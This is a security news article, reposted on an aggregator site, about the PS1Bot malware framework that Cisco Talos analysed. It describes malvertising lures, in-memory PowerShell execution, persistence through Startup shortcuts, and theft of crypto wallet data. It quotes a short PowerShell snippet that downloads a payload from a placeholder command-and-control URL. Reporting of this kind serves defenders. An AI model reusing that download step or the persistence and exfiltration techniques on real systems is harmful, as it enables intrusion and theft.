κατασκευή ιστοσελίδων ρόδος

TECH - WEB DEVELOPMENT NEWS

Get the latest tech - web development news and analysis on industry around the world.

  • HOME
You are here: Home / INDUSTRY NEWS / Threat Actors Attacking Windows Systems With New Multi-Stage Malware Framework PS1Bot
άμυνα
.

Threat Actors Attacking Windows Systems With New Multi-Stage Malware Framework PS1Bot

15/08/2025

A sophisticated new malware campaign targeting Windows systems has emerged, employing a multi-stage framework dubbed “PS1Bot” that combines PowerShell and C# components to conduct extensive information theft operations.

The malware represents a significant evolution in attack methodologies, utilizing modular architecture and in-memory execution techniques to evade traditional detection mechanisms while maintaining persistent access to compromised systems.

PS1Bot operates through malvertising campaigns that deliver compressed archives with filenames designed to match search engine optimization patterns, such as “chapter 8 medicare benefit policy manual.zip” and “Counting Canadian Money Worksheets Pdf.zip.e49”.

These seemingly legitimate files contain a JavaScript downloader named “FULL DOCUMENT.js” that initiates the infection chain by retrieving additional malicious components from attacker-controlled servers.

The malware’s modular design enables threat actors to deploy various specialized components on-demand, including information stealers, keyloggers, screen capture tools, and persistence mechanisms.

Cisco Talos analysts noted that PS1Bot has been extremely active throughout 2025, with new samples being observed continuously, indicating ongoing development and refinement of the framework.

Deobfuscating the downloader script (Source – Cisco Talos)

What distinguishes PS1Bot from conventional malware is its emphasis on stealth through minimal disk footprint and extensive use of in-memory execution.

The framework leverages PowerShell’s Invoke-Expression (IEX) functionality to dynamically execute modules without writing them to disk, significantly reducing the likelihood of detection by traditional antivirus solutions.

Sophisticated Persistence and Evasion Mechanisms

PS1Bot implements a particularly clever persistence strategy that creates randomly-named PowerShell scripts within the %PROGRAMDATA% directory alongside corresponding shortcut files.

The malware generates a malicious LNK file in the Windows Startup directory that points to these PowerShell scripts, ensuring reactivation after system reboots.

The persistence module retrieves obfuscated payloads from the command and control server’s “/transform” endpoint, as demonstrated in the following code structure:-

$url = “http://[C2_SERVER]/transform”
$content = (New-Object Net.WebClient).DownloadString($url)
# Content is then deobfuscated and written to randomly-named PS1 file

This payload contains the same C2 polling logic used in the initial infection, creating a self-perpetuating cycle.

The malware constructs unique communication URLs using the infected system’s C: drive serial number, enabling individualized tracking of compromised machines while maintaining operational security.

The framework’s information theft capabilities are particularly concerning, targeting cryptocurrency wallets through embedded wordlists containing seed phrase combinations in multiple languages.

Example HTTP POST containing Base64 encoded screenshot image file (Source – Cisco Talos)

PS1Bot scans the file system for documents containing wallet recovery phrases and password files, compressing and exfiltrating this sensitive data via HTTP POST requests to attacker infrastructure.

Cisco Talos researchers identified significant code similarities between PS1Bot and previously reported malware families, including AHK Bot and components associated with Skitnet campaigns, suggesting potential shared development resources or threat actor collaboration across these operations.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.
Source: cybersecuritynews.com

Filed Under: INDUSTRY NEWS Tagged With: Source-10

This survival horror game with 96% positive reviews is at its lowest price ever on Steam, if you're quick

The Steam Autumn Sale is coming to an end, so now is the time to pick up those deals you've been thinking about. If you're still looking for a good discount to pull the trigger on, how about grabbing a horror game to get into the October spirit? Source: xda-developers.com … [Read More...]

Kuttram Purindhavan: The Guilty One OTT Release: Pasupathy’s Gripping Thriller Coming Soon

Kuttram Purindhavan: The Guilty One is an intense Tamil suspense thriller which looks at the moralities, secrets and consequences of hidden sins. Driven by Pasupathy's commanding central performance, the series looks at how one man's actions start to infect him with guilt, turmoil and moral ambiguity. A reluctant protagonist driven to desperation, the story holds out cerebral tension and internal … [Read More...]

Someone built an ESP32 handheld NES emulator as their "first embedded project," and I wish all my first projects went this well, too

My first projects don't always turn out as planned. But that's okay, you know? Because the first time is always a learning experience. It's all about getting accustomed to the situation, figuring out how to accomplish tasks, and laying a foundation for future endeavors. And I remind myself that those early projects are essential, as a way to "fail forward" and keep improving. And I love them for … [Read More...]

Tornado OTT Release Date: When and Where to Watch This British Period Drama Online?

Written and directed by John Maclean, Tornado is a British period drama movie that stars Koki in the lead role. The film revolves around Tornado, a samurai fighter, who embarks on a quest to take revenge for his father's murder and steal the gold of the loot. However, things get intense when she finally crosses paths with a crime gang led by the Sugarman and his son, Little Sugar. The movie has … [Read More...]

New WireTap Attack Break Server SGX To Exfiltrate Sensitive Data

A newly disclosed vulnerability, named the WireTap attack, allows attackers with physical access to break the security of Intel’s Software Guard eXtensions (SGX) on modern server processors and steal sensitive information. A research paper released in October 2025 details how this method can extract cryptographic keys from supposedly secure SGX enclaves using a low-cost setup, challenging the … [Read More...]

Unity Real-Time Development Platform Vulnerability Let Attackers Execute Arbitrary Code

Unity Technologies has issued a critical security advisory warning developers about a high-severity vulnerability affecting its widely used game development platform.  The flaw, designated CVE-2025-59489, exposes applications built with vulnerable Unity Editor versions to unsafe file loading attacks that could enable local code execution and privilege escalation across multiple operating … [Read More...]

Microsoft to Disable Inline SVG Images Display to Outlook for Web and Windows Users

Microsoft has announced a significant security enhancement for Outlook users, implementing the retirement of inline SVG image support across Outlook for Web and the new Outlook for Windows platforms.  This change represents a proactive measure to strengthen email security infrastructure and protect users from potential cybersecurity threats. The rollout timeline has been strategically … [Read More...]

5 tips for setting up guest Wi-Fi that isn't a danger to your home

Having guests over is great until they ask for the Wi-Fi password. I'm then faced with the awkward dance of finding that crumpled sticky note, dictating a convoluted string of alphanumeric characters, and hoping they type it in correctly. But the real problem is how guests feel like I'm inviting a security nightmare home. Digitally, handing out my main Wi-Fi password is like giving a stranger a … [Read More...]

Acer Chromebook Plus Spin 514 review: a versatile, convertible powerhouse

A good Chromebook can sometimes be hard to find. Many ChromeOS devices are too underpowered to really do much beyond browse the web and manage your email, or they suffer from poor build quality, dim displays, or uncomfortable keyboards. But that's not the case with the new Acer Chromebook Plus Spin 514. Source: xda-developers.com … [Read More...]

Wolverine: 4 Marvel characters we'd love to see meet up with Logan

During the State of Play presentation for September 2025, Insomniac Game finally gave everyone an official first look at their upcoming Wolverine game. What was very clear from the start was that this would be different from what fans have come to expect from the studio, given their Spider-Man titles were wildly successful. For many people who love Marvel Comics, Wolverine is a character that … [Read More...]

Tags

Source-1 Source-2 Source-3 Source-4 Source-5 Source-6 Source-7 Source-8 Source-9 Source-10 Source-12 Source-13 Source-15 Source-16

Tech Web Development News

This is a PERSONAL and PRIVATE WEBPAGE. Please leave this page. Contact me via email : admin@news-6.com about anything you would like to ask or problem.

Tech News

Disclaimer!
In every post is written below the original source of the post. Copyrights belong on their owners.

Web Development News

HOTELS – CRUISES – CARS – TRAVEL

Recent Posts

  • This survival horror game with 96% positive reviews is at its lowest price ever on Steam, if you're quick
  • Kuttram Purindhavan: The Guilty One OTT Release: Pasupathy’s Gripping Thriller Coming Soon
  • Someone built an ESP32 handheld NES emulator as their "first embedded project," and I wish all my first projects went this well, too
  • Tornado OTT Release Date: When and Where to Watch This British Period Drama Online?
  • New WireTap Attack Break Server SGX To Exfiltrate Sensitive Data

Technology - Seo

Categories

  • INDUSTRY NEWS

World Industry News

Privacy & Cookies: This site uses cookies.
To find out more, as well as how to remove or block these, see here: Our Cookie Policy
TECH - WEB DEVELOPMENT NEWS @ COPYRIGHTS 2023